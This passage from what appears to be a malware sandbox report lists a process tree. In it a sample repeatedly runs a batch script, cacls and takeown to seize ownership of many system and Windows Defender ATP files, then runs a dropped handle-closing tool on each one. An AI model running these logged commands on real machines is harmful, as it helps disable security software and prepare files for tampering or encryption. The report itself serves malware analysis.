    takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:5116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:4192
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:2768
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe""
  2⤵
  PID:4316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G Admin:F /C
    3⤵
    PID:4584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "MsSense.exe" -nobanner
    3⤵
    PID:992
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "MsSense.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4524
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4512
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:4280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4828
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4736
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui""
  2⤵
  PID:4840
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "MsSense.exe.mui" -nobanner
    3⤵
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "MsSense.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4980
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Mail\WinMail.exe""
  2⤵
  PID:4764
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\WinMail.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:2768
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4320
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:5076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:4504
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:248
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:4172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4288
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:4184
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4240
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
  2⤵
  PID:4804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
    3⤵
    PID:5000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "BrowserCore.exe" -nobanner
    3⤵
    PID:4128
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "BrowserCore.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4120
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""
  2⤵
  PID:4348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:4780
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:4784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:188
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:3356
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
  2⤵
  PID:4048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
    3⤵
    PID:4152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "manifest.json" -nobanner
    3⤵
    PID:5064
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "manifest.json" -nobanner
      4⤵
      Executes dropped EXE
      PID:3756
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe""
  2⤵
  PID:4656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe" /E /G Admin:F /C
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "SenseSampleUploader.exe" -nobanner
    3⤵
    PID:4612
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "SenseSampleUploader.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4396
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:4288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4464
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4588
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:5004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:4988
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:4724
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:4836
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4944
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  2⤵
  PID:4816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "BrowserCore.exe.mui" -nobanner
    3⤵
    PID:4820
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "BrowserCore.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4892
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:4152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:5084
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4048
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:4224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:248
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:256
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe""
  2⤵
  PID:4236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" /E /G Admin:F /C
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "SenseCncProxy.exe" -nobanner
    3⤵
    PID:4188
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "SenseCncProxy.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4368
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:4856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4112
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4984
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:2268
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:5056
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:4832
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:4200
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5108
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3356
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""
  2⤵
  PID:5092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"
    3⤵
    - Modifies file permissions
    PID:5084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
    3⤵
    PID:276
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4416
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""
  2⤵
  PID:4520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:4824
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "Identity-V" -nobanner
      4⤵
      Executes dropped EXE
      PID:904
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:4584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:4352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:4120
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "settings.dat" -nobanner
      4⤵
      Executes dropped EXE
      PID:4176
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:4360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:2232
